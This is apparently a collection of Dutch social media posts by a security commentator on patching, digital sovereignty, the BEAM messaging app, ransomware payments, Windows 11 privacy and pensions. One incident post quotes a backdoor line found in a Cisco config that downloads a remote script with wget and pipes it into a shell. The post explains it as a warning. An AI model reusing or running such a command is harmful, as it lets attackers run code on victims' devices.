Jan Guldentops

Laatste dag van het jaar. Tijd om jullie allemaal een succesvol en vooral gelukkig 2026 te wensen. De komende week ga ik elke dag een post besteden aan wat er voor mezelf, voor @batweets en voor verschillende projecten zoals @ CYSSME op stapel staat voor het komende jaar. Als denkoefening probeer ik elke dag over één specifiek aspect een status quaestionis en een quo vadis te formuleren. Waar de wereld, de samenleving en de technologie op dit moment staan, en waar we volgens mijn bescheiden mening op het vlak van security en privacy naartoe gaan. Noem het een nieuwsbrief in hoofdstukken. Maar dat is voor na het feestje en de champagne vanavond. Feest ze! 🥂 ✨ 2026 🥂 ✨

Voor wie zich afvraagt waarom je al je systemen (en zeker je netwerkapparatuur) up-to-date moet houden: een voorbeeld van een gecompromitteerde Cisco router/firewall. Mijn zondagochtend begint goed. Voor een publieke gastnetwerk ben ik een simpele uitgaande Linux-firewall aan het opzetten. Ik had hen gevraagd de bestaande config die ze zelf hadden opgezet door te sturen om alle providersettings over te brengen. Nog half slapend valt me één lijn in de Cisco config op: NTPSERVER=/usr/bin/wget -q -O - lnkd.in/evBa7yJv | /bin/ash Geen complex, goed weggestopt binair commando maar een simpele command injection die iedereen met een beetje Linux-ervaring direct herkent. Telkens de machine zijn tijd via NTP juistzet, doet het een webcall naar een adres ergens op een vermoedelijk gehackte server in Riga en haalt het daar een shellscript op en voert het uit via de ash-shell. Het IP is niet meer bereikbaar, vermoedelijk opgespoord en offline gehaald, maar ik durf er gif op in te nemen dat dit een achterdeurtje opzet. Het leert je hoe erg Cisco-ontwikkelaars met informatieveiligheid en "secure development" bezig waren toen deze firmware werd gemaakt. Een beetje research leert me dat het vermoedelijk om een exploit van 2020/1 gaat (CVE-2021-1472 of CVE-2020-3452). Bugs die snoodaards helpen om de webinterface over te nemen en wijzigingen uit te voeren en dit soort kruimels achter te laten. Dit hangt de firewall vermoedelijk in één of ander botnet. Ik gok op Mirai of Gafgyt. Wat moet je hier nu uit leren? Les 1: Hou alle brol die je aan je netwerk hangt (draadloos of bekabeld) regelmatig up-to-date. En we hebben tegenwoordig de neiging om van alles en nog wat aan het netwerk te hangen. Al deze IoT (Internet of Things, vaak terecht ook Internet of Shit genoemd) zijn niet alleen potentiële risico’s voor je eigen infrastructuur, ze zijn ook de zombies in de botnets die wereldwijd gebruikt worden om anderen aan te vallen. Les 2: Segmenteer alles. Het gaat hier om een losse oude firewall die voor hun guest wifi werd gebruikt dus met een beetje geluk valt de schade mee maar waarom moet de webinterface in godsnaam toegankelijk zijn van een publiek netwerk? Zelfs al is hij gepatcht en up-to-date. Het verbaast me nog elke keer dat, wanneer ik bij ergens binnenstap en me met het netwerk verbind, ik als gewone gebruiker management-interfaces van switches, printers en zelfs server- en backup-infrastructuur kan zien. Scherm alles af in eigen netwerken die je al dan niet vertrouwt en zet tussen deze netwerken een deny all policy met logging van elke inbreuk op. Logging die je liefst automatisch ook laat controleren op anomalieën Les 3: Security monitoring (met welke duurklinkende afkorting je het ook wil verkopen) is geen nice-to-have meer, maar essentieel om de continuïteit van je organisatie te kunnen garanderen. Technische tips & howto's, links, meer informatie, feedback, voortschrijdende inzichten zoals altijd in de link👇 linkedin.com/posts/jangulde…

#SCHANDE Waar ons ambtenaren-apparaat zich mee bezig houdt: standaard.be/politiek/pensi… En dan vragen politici zich af waarom de burger geen enkel vertrouwen over heeft in de overheid...

Activist: "The water usage for beef is obscene. Thousands of litres per kilogram." Farmer: "That's rainfall." Activist: "What?" Farmer: "The figure includes all the rain that falls on the pasture. The cows drink from the stream. The rain falls whether there's a cow here or not." Activist: "It's still water consumption." Farmer: "Should I stop the rain falling on my field?" Activist: "Grow crops instead. More efficient." Farmer: "This is a 35-degree slope in the Welsh hills. Show me the crop." Activist: "Technology..." Farmer: "To make tractors climb mountains?" Activist: "There must be a solution." Farmer: "There is. It's called a cow." Activist: [checks phone]

Verzonnen data en valse quotes in slechte journalistiek of dubieus onderzoek zijn van alle tijden. Daar heb je geen AI of LLM voor nodig. De hele geschiedenis door komen vervalsingen voor, soms met zware real-politieke motieven zoals de Donatio Constantini, soms simpelweg uit intellectuele luiheid of tijdsdruk. Peter Vandermeersch is iemand naar wie ik opkijk, één van mijn intellectuele helden. Maar ook helden hebben hun momenten van zwakte. Zelfs de Griekse halfgoden waren uiteindelijk maar mensen met hun eigen gebreken. Die luiheid zien we vandaag zelfs in de hoogste universitaire ivoren torens. Wanneer een rector van een Vlaamse universiteit die hoogstpersoonlijk met hulp van ChatGPT verloren quotes van Einstein meent terug te vinden. Zelfs betrapt had ze geen echt schuldbesef maar probeerde zichzelf af te schilderen als een slachtoffer. LLM’s zijn geweldige hulpmiddelen, net zoals een spellingschecker of Google dat zijn. Maar je blijft als mens altijd zelf verantwoordelijk voor de zin en onzin die je publiceert. Zeker wanneer het verder gaat dan je eigen dagboek. Schrijvers uit de 19de en 20ste eeuw zochten hun inspiratie soms in illegale roesmiddelen bij hoge tijdsdruk. In de 21ste eeuw kan je gezonder, veiliger en vooral goedkoper hallucineren met hulp van AI. Op onze universiteiten studeren elk jaar honderden historici af. Onze samenleving denkt vaak erg utilitair over hoger onderwijs en serveert hen soms af als enkel geschikt voor het archief, onderwijs of de politiek. Niks is minder waar. Historici zijn in hun opleiding gedrild om dit soort vervalsingen op te sporen. Al in hun eerste jaar moeten ze bronnen binnenstebuiten keren voor hun eerste bronnenonderzoek traditioneel de “Vita” genoemd. Dat zijn proeven die qua werkniveau en schrijflast in veel andere opleidingen de buurt van een thesis halen. De samenleving schildert ons historici vaak af als een nutteloze luxe. Ik denk dat we in tijden van AI en massale hallucinaties maatschappelijk nuttiger zijn dan ooit. linkedin.com/posts/jangulde…

Gisteren las ik de eerste artikelen rond BEAM, de eigen, end-to-end versleutelde en soevereine chat- en telefonie-applicatie van de overheid. Even een snelle technische en inhoudelijke blik. Een samenvatting op de bekende "the good, the bad & the ugly" manier. ✅ GOOD is dat men kiest voor een veilig en soeverein alternatief voor de wildgroei aan chat-toepassingen die gebruikt worden door ambtenaren en veiligheidspersoneel. Denk aan onveilige applicaties als WhatsApp, Messenger, Teams of zelfs SMS. Stuk voor stuk diensten waar je de integriteit, veiligheid en beschikbaarheid niet van kunt garanderen. De keuze voor het open source Matrix is uitstekend. Hiermee volgt men andere Europese projecten zoals Tchap (FR) of de BWMessenger (DE) Zelfs Oekraïne gebruikt Matrix. Men heeft het warm water niet opnieuw uitgevonden en kan kostenefficiënt werken. Bovendien is het volledig self-hosted, soeverein op te zetten met veel decentralisatie. Een stap weg van een overheid die voor haar communicatie vandaag volledig gevangen zit bij Microsoft en Meta ⚠️ BAD zie ik een paar dingen in de achterliggende infra waar ik vragen bij heb. Dit is een stap naar digitale soevereiniteit, maar toch wordt de mail voor beam.belgium.be gehost op O365. Alle mail, inclusief bv support of een account-reset, loopt dus via een VS speler. Dit begrijp ik niet voor een project dat veilig en sovereign wil zijn. Technisch zien we dat beam.belgium.be niet eens een DNSSEC-record heeft. Er zijn ook geen IPv6-records. De infra zelf staat bij de Provincie Vlaams-Brabant ipv Belnet. De redundantie lijkt beperkt: geen meerdere DNS-records of zichtbare loadbalancers. Dit maakt het kwetsbaar voor Denial-of-Service-aanvallen. Het gebruik van Let's Encrypt certificaten is prima voor een klein project, maar hier had ik een commercieel certificaat bv GlobalSign verwacht. 👹 UGLY Is dit een kerntaak voor de overheid ? Ik had het liever in een Benelux of EU-geheel gezien. Maar als ons land het voortouw kan nemen, net zoals in de Cyberfundamentals van het Centre for Cybersecurity Belgium, is dat vaak de investering waard. De timing met de verjaardag van de aanslag op Zaventem stoort me. Het voelt als een politieke operatie die snel moest gaan. De nadruk in de artikelen op audits/pentesten terwijl zoiets banaals als DNSSEC niet op orde is, bevestigt dat vermoeden. Daarnaast valt Matrix helaas onder de Apache 2.0 licentie. Bijdrages van de Belgische overheid hoeven dus niet verplicht terug naar de open source community gebracht te worden en ik kan voorlopig ook geen publieke bijdrages vinden. Als historicus vraag ik me bovendien af hoe dit samengaat met de openbaarheid van bestuur. De applicatie is gebouwd op confidentialiteit, maar hoe zit het met archivering en transparantie (openbaarheid van bestuur ) ? CONCLUSIE Mijn eerste indruk is positief maar met een maar kanttekeningen. Het is een eerste, snelle analyse, bekijk het mee, alle materiaal en details in de comments. 👇 linkedin.com/posts/jangulde…

Als je bij de hond slaapt, krijg je zijn vlooien. Ik heb het zelf altijd moeilijk gehad met consultants en bedrijven die onderhandelen met de onderwereld. Natuurlijk begrijp ik de reflex om te betalen, of op zijn minst te praten, wanneer je als bedrijf alles kwijt bent en geen uitweg meer ziet. Maar het is niet slim. Op termijn graaf je zo je eigen graf. Mijn principe blijft onveranderd: betaal nooit. Het wordt pas echt absurd als zogenaamde cybersecurity-experts in het ODIDO-verhaal oproepen om losgeld te betalen om te voorkomen dat data publiek gaat. Die data is al in handen van de maffia. Door te betalen maak je het probleem alleen groter en financier je de volgende aanval. De stelling dat we het vertrouwen in de betrouwbaarheid van ransomware-groepen niet mogen ondermijnen, is werkelijk helemaal van de pot gerukt. Alsof we de klantvriendelijkheid van criminelen moeten koesteren. Voor de duidelijkheid: Concreet gaat dit niet over een bekende onderhandelaar van bij ons, maar over 3 Amerikanen met wel een heel bijzonder businessmodel had: eerst zelf de aanvallen uitvoeren om nadien de onderhandelingen over het losgeld te faciliteren. There is no honor among thieves. Technische tips & howto's, links, meer informatie, feedback, voortschrijdende inzichten zoals altijd in de comments👇 linkedin.com/posts/jangulde…

Oorspronkelijke @Linkedin post rond windows 11 met alle bijkomende links, informatie en discussiepunten: linkedin.com/posts/jangulde…

Windows 11 begint steeds meer op legale ransomware te lijken. Wat ik hiermee bedoel? #Onedrive, #Copilot en #AI staan standaard aan en sturen als een Trojaans paard al je data door naar @Microsoft . Dit is geen opt-in waar je zelf bewust voor kiest: het staat simpelweg aan vanaf de installatie. Je moet al technisch onderlegd en zeer hardnekkig zijn om al deze functies volledig uit te schakelen. De meeste gebruikers beseffen niet dat dit gebeurt en dat hun softwareleverancier bij een standaardconfiguratie toegang heeft tot al deze data. Slaag je er al in om het overdreven synchroniseren naar Onedrive te beperken, dan neust @Copilot er nog wel even doorheen of analyseert de gratis AI in Word, Excel of Outlook je documenten in de cloud. Zonder te diep in de juridische kant van de Cloud Act of GDPR te duiken, blijft het onbegrijpelijk dat we dit als individuen, bedrijven en overheid collectief aanvaarden. Europa zou op zijn minst moeten eisen dat dit een duidelijke opt-in wordt: standaard uit, tenzij de gebruiker er bewust voor kiest. Elk bedrijf en elke overheid die met confidentiële data werkt, zou dit per direct moeten blokkeren of er een stevige extra encryptie-beveiligingslaag bovenop moeten leggen. Technische tips & howto's, links, meer informatie, feedback, voortschrijdende inzichten zoals altijd in de comments👇

Oorspronkelijke @LinkedIn post met alle extra informatie en discussie rond het Europese gebrek aan sovereigniteit : linkedin.com/posts/jangulde…

Een paar cijfers die het Europese gebrek aan sovereigniteit in het juiste financiële kader plaatsen. 👉 265 miljard euro: Het bedrag dat Europa jaarlijks uitgeeft aan Amerikaanse techbedrijven voor cloud en softwarediensten. Ter vergelijking: dit bedrag is gelijk aan het totale bruto binnenlands product van Portugal. 👉481 miljoen euro: De uitgaven van de Duitse federale overheid (zonder de deelstaten) aan Microsoft licenties in 2025. 👉75 procent: De stijging van deze Duitse overheidsuitgaven aan Microsoft licenties in 2025 ten opzichte van 2023. 👉70 procent: Het gecombineerde marktaandeel van slechts drie Amerikaanse partijen (Amazon, Microsoft en Google) op de Europese cloudmarkt. En dit zijn nog maar de rechtstreekse kosten. Indirect is het verlies voor Europa in achterstelling op het vlak van innovatie en het niet investeren in lokale partners vele factoren groter. In veel gevallen hebben we ons bovendien zo vastgereden door onze infrastructuur niet cloud agnostisch op te zetten, dat we eigenlijk niet meer weg kunnen of daar op zijn minst een heel zware prijs voor gaan betalen. Tegelijkertijd hangen we af van een Amerikaanse partner die, als het hem niet aanstaat, elk moment de stekker eruit kan trekken. Ik snap niet hoe onze politici, ons bedrijfsleven en wij allemaal het zo ver hebben kunnen laten komen. Ik kon de cijfers niet direct vinden voor de Belgische of Vlaamse overheid. Welk parlementslid doet zijn werk en stelt hierover eens een parlementaire vraag? De miljardencontracten die ook hier voor decennia worden vastgelegd met de usual suspects suggereren dat we exact dezelfde fout maken. Terwijl we zulke geweldige, innovatieve bedrijven en mensen hebben. Onbegrijpelijk. Links, meer informatie, feedback, voortschrijdende inzichten zoals altijd in de comments👇

Samenvatting van het gros v/d commentaren over de pensioenhervorming: “Ik snap dat er moet hervormd worden, maar doe dat enkel bij een ander a.u.b.”

De media hebben de kans gemist om de bevolking goed in te lichten over een noodzakelijke hervorming van de pensioenen. In plaats ervan werd een karikatuur opgevoerd die frustratie voedt en uiteindelijk alleen de extreme partijen goed uitkomt. Je oogst wat je jarenlang zaait.

@JJvanWijck #dtv welke publicatie komt dit uit ? ;-)

En een derde is slecht in breuken...

En maar selectief statistiekjes selecteren die je eigen groep in de slachtoffer-rol stopt. Waarom hoor je nooit dat dat vrouwen gemiddeld 4 jaar ouder worden dan mannen ( zou ook een argument zijn om mannen meer pensioen te geven bv), 75% van de zelfmoorden mannen zijn, 93% van de fatale ongevallen op de werkvloer mannen zijn, enz. enz. Oeps. nu doe ik het ook ;-)

@Stijn_Baert De ugly truth is dat geen systeem op basis van gewerkte tijd met sociale correcties willen, we willen een systeem dat maximaal geeft wat we vinden dat we verdienen.

Stel dat we echt vinden dat het onkies is om ook vrouwen tot langer (voltijds) werken te verleiden via de pensioenopbouw, vinden we het dan eerbaar om de verduurzaming van onze welvaartsstaat in tijden van vergrijzing volledig bij langer werken door mannen te leggen?

Optimism is a moral duty, but when it comes to technology and innovation, it is often a poisoned chalice. #opinion #justsaying #4AMtoughts #ai linkedin.com/posts/jangulde…

Verdere discussie en extra materiaal kan je vinden op deze linkedinpost: linkedin.com/posts/jangulde…

Microsoft geeft IT beheerders meer tijd voor Outlook switch Soms vertel ik als kwinkslag dat er in Redmond volgens mij een team van honderden developers zit dat zich maar met één ding bezighoudt: ervoor zorgen dat de volgende upgrade van mijn minst favoriete besturingssysteem of Office suite zo geherorganiseerd is dat ik er niets in terugvind en er grijze haren van krijg. Maar dit kan natuurlijk aan mij liggen. In zijn ongelooflijke goedheid heeft Microsoft besloten dat je de Outlook Classic versie, die je als gebruiker al jaren gebruikt en waarin je alles georganiseerd en geïntegreerd hebt, nog even mag blijven gebruiken. Pas in april 2026 gaan we naar de opt-out fase waarbij de nieuwe versie de standaard wordt. De definitieve deadline voor het pensioen van Classic staat nu op 2029. Uitstel, geen afstel. Ik ken geen betere illustratie van hoe misgroeid de relatie tussen de doorsnee professionele gebruiker en zijn voornaamste softwareleverancier eigenlijk is. Uw leverancier vindt dat hij moet bepalen hoe u de software waar u elke maand veel centen voor betaalt, mag gebruiken. Het past in een kwalijke evolutie waar de producent bepaalt hoe en hoe lang u de producten die u koopt kunt gebruiken. Een vagevuur waar u wel betaalt maar eigenlijk nooit eigenaar bent. Aan mij is geen Outlook gebruiker verloren gegaan, ik vind het de meest onbruikbare, hatelijke software die ik ken. Als ik het goed begrijp is de nieuwe Outlook in feite een gestripte web app. Essentiële zaken zoals COM add-ins, fatsoenlijke offline ondersteuning en lokale PST archieven (!) sneuvelen in de naam van de vooruitgang. Benieuwd of de EU Cyber Resilience Act (CRA) ook van toepassing is op het ondersteunen van de interface en de continuïteit van kritische workflows. Als een interface wijziging bestaande integraties breekt, voldoet de leverancier dan nog wel aan zijn zorgplicht gedurende de levenscyclus van het product? Het lijkt me een leuk vraagstuk voor juristen...

De harde waarheid over pensioenen? We willen geen systeem op basis van gewerkte tijd met sociale correcties. We willen een systeem dat geeft wat we vinden dat we verdienen. De kloof tussen bijdrage en verwachting is de nekslag voor elk eerlijk debat. @JanJambon #pensioenen #beleid #belgië